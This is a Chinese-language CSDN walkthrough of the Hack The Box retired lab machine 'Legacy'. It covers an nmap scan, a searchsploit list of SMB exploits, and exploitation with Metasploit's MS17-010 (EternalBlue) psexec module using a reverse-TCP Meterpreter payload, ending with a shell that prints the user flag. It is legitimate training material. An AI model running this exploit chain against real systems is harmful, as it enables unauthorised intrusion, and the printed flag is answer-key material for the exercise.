Retired Machines的第二台,前面的靶机都是比较简单的,通常都是适应性的训练,找到合适的突破点就可以了。
目录
0x00 靶场介绍
Legacy这台靶机是windows靶机,我们之前在Vulnhub上使用的靶机基本上都是linux操作系统。那么我们就来看看这台靶机是什么情况。
先看下靶机的具体信息:
0x01 端口扫描
接下来做下端口扫描,看看有开放哪些服务
root@kali:~# nmap -T5 -A -v 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-31 20:12 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:12
Completed NSE at 20:12, 0.00s elapsed
Initiating NSE at 20:12
Completed NSE at 20:12, 0.00s elapsed
Initiating NSE at 20:12
Completed NSE at 20:12, 0.00s elapsed
Initiating Ping Scan at 20:12
Scanning 10.10.10.4 [4 ports]
Completed Ping Scan at 20:12, 0.34s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:12
Completed Parallel DNS resolution of 1 host. at 20:12, 0.10s elapsed
Initiating SYN Stealth Scan at 20:12
Scanning 10.10.10.4 [1000 ports]
Discovered open port 139/tcp on 10.10.10.4
Discovered open port 445/tcp on 10.10.10.4
Completed SYN Stealth Scan at 20:13, 26.88s elapsed (1000 total ports)
Initiating Service scan at 20:13
Scanning 2 services on 10.10.10.4
Completed Service scan at 20:13, 7.32s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.4
Retrying OS detection (try #2) against 10.10.10.4
Initiating Traceroute at 20:13
Completed Traceroute at 20:13, 0.46s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:13
Completed Parallel DNS resolution of 2 hosts. at 20:13, 0.42s elapsed
NSE: Script scanning 10.10.10.4.
Initiating NSE at 20:13
Completed NSE at 20:14, 52.52s elapsed
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Nmap scan report for 10.10.10.4
Host is up (0.37s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows 2003 SP2 (90%), Microsoft Windows Server 2003 (90%), Microsoft Windows 2000 SP4 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h58m22s, deviation: 1h24m50s, median: 4d23h58m22s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:4e:64 (VMware)
| Names:
| LEGACY<00> Flags: <unique><active>
| HTB<00> Flags: <group><active>
| LEGACY<20> Flags: <unique><active>
| HTB<1e> Flags: <group><active>
| HTB<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-02-06T05:11:41+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 442.76 ms 10.10.14.1
2 442.94 ms 10.10.10.4
NSE: Script Post-scanning.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.82 seconds
Raw packets sent: 3081 (138.976KB) | Rcvd: 56 (3.072KB)
0x02 samba服务
我们可以看到只开启了139和445服务,操作系统是winxp。
应该是有很多漏洞可以使用的,我简单演示一下查找漏洞的过程
root@kali:~# searchsploit smb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Apple Mac OSX - 'mount_smbfs' Local Stack Buffer Overflow | exploits/osx/local/4759.c
CyberCop Scanner Smbgrind 5.5 - Buffer Overflow (PoC) | exploits/windows/dos/39452.txt
Ethereal 0.x - Multiple iSNS / SMB / SNMP Protocol Dissector Vulnerabilities | exploits/linux/remote/24259.c
LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - 'Login' Local File Inclusion / Authentication Bypass | exploits/cgi/webapps/29761.txt
Links 1.00pre12 - 'smbclient' Remote Code Execution | exploits/multiple/remote/2784.html
Links_ ELinks 'smbclient' - Remote Command Execution | exploits/linux/remote/29033.html
Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass | exploits/linux/local/27766.txt
Linux pam_lib_smb < 1.1.6 - '/bin/login' Remote Overflow | exploits/linux/remote/89.c
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054) | exploits/windows/dos/14607.py
Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit) | exploits/windows/remote/16366.rb
Microsoft SMB Driver - Local Denial of Service | exploits/windows/dos/28001.c
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | exploits/windows/remote/43970.rb
Microsoft Windows - 'SMB' Transaction Response Handling (MS05-011) | exploits/windows/dos/1065.c
Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit) | exploits/windows/dos/6463.rb
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050) | exploits/windows/remote/40280.py
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) | exploits/windows/remote/14674.txt
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit) | exploits/windows/remote/16363.rb
Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137) | exploits/windows/dos/40744.txt
Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006) | exploits/windows/dos/12258.py
Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit) | exploits/windows/remote/16360.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | exploits/windows/dos/41891.rb
Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service | exploits/windows/dos/12524.py
Microsoft Windows - SmbRelay3 NTLM Replay (MS08-068) | exploits/windows/remote/7125.txt
Microsoft Windows 10 - SMBv3 Tree Connect (PoC) | exploits/windows/dos/41222.py
Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation | exploits/windows/local/47115.txt
Microsoft Windows 2000/XP - SMB Authentication Remote Overflow | exploits/windows/remote/20.txt
Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution | exploits/windows/remote/41929.py
Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution | exploits/windows/remote/44616.py
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows/remote/42031.py
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC) | exploits/windows/dos/12273.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows/remote/42315.py
Microsoft Windows 8.1/2012 R2 - SMBv3 Null Pointer Dereference Denial of Service | exploits/windows/dos/44189.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/42030.py
Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal | exploits/windows/remote/20371.txt
Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client | exploits/windows/remote/19197.txt
Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation | exploits/windows/dos/43517.txt
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/41987.py
Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063) | exploits/windows/dos/9594.txt
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (MS06-030) | exploits/windows/local/1911.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1) | exploits/windows/dos/21746.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (2) | exploits/windows/dos/21747.txt
MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow | exploits/hardware/remote/44290.py
Netware - SMB Remote Stack Overflow (PoC) | exploits/novell/dos/13906.txt
SMBlog 1.2 - Arbitrary PHP Command Execution | exploits/php/webapps/27340.txt
SQL-Ledger 2.6.x/LedgerSMB 1.0 - 'Terminal' Directory Traversal | exploits/cgi/webapps/28514.txt
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC) | exploits/multiple/dos/5712.pl
Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure | exploits/hardware/webapps/38004.txt
SmbClientParser 2.7 Perl Module - Remote Command Execution | exploits/multiple/remote/32084.txt
VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit) | exploits/windows_x86/local/16678.rb
VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Buffer Overflow | exploits/windows/remote/9303.c
VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Universal Buffer Overflow | exploits/windows/remote/9318.py
VideoLAN VLC Media Player 0.9.9 - 'smb://' URI Stack Buffer Overflow (PoC) | exploits/windows/dos/9029.rb
VideoLAN VLC Media Player 1.0.0/1.0.1 - 'smb://' URI Handling Buffer Overflow (PoC) | exploits/windows/dos/9427.py
VideoLAN VLC Media Player 1.0.2 - 'smb://' URI Stack Overflow | exploits/windows/remote/9816.py
VideoLAN VLC Media Player 1.0.3 - 'smb://' URI Handling Remote Stack Overflow (PoC) | exploits/windows/dos/10333.py
VideoLAN VLC Media Player < 1.1.4 - '.xspf smb://' URI Handling Remote Stack Overflow (PoC) | exploits/windows/dos/14892.py
Visale 1.0 - 'pblsmb.cgi?listno' Cross-Site Scripting | exploits/cgi/webapps/27681.txt
ZYXEL Router 3.40 Zynos - SMB Data Handling Denial of Service | exploits/hardware/dos/29767.txt
foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution | exploits/multiple/remote/36013.txt
smbftpd 0.96 - SMBDirList-function Remote Format String | exploits/linux/remote/4478.c
smbind 0.4.7 - SQL Injection | exploits/php/webapps/14884.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
0x03 永恒之蓝
我这里就选择最著名的MS17-010“永恒之蓝”,打开msf,直接设置相关参数,执行结果如下:
msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 10.10.10.4 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.20 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
执行之后,我们可以直接获取flag信息
meterpreter > shell
Process 444 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>type "c:\Documents and Settings\john\Desktop\user.txt"
type "c:\Documents and Settings\john\Desktop\user.txt"
e69af0e4f443de7e36876fda4ec7644f
C:\WINDOWS\system32>
来源:CSDN
作者:3riC5r
链接:https://blog.csdn.net/fastergohome/article/details/104133208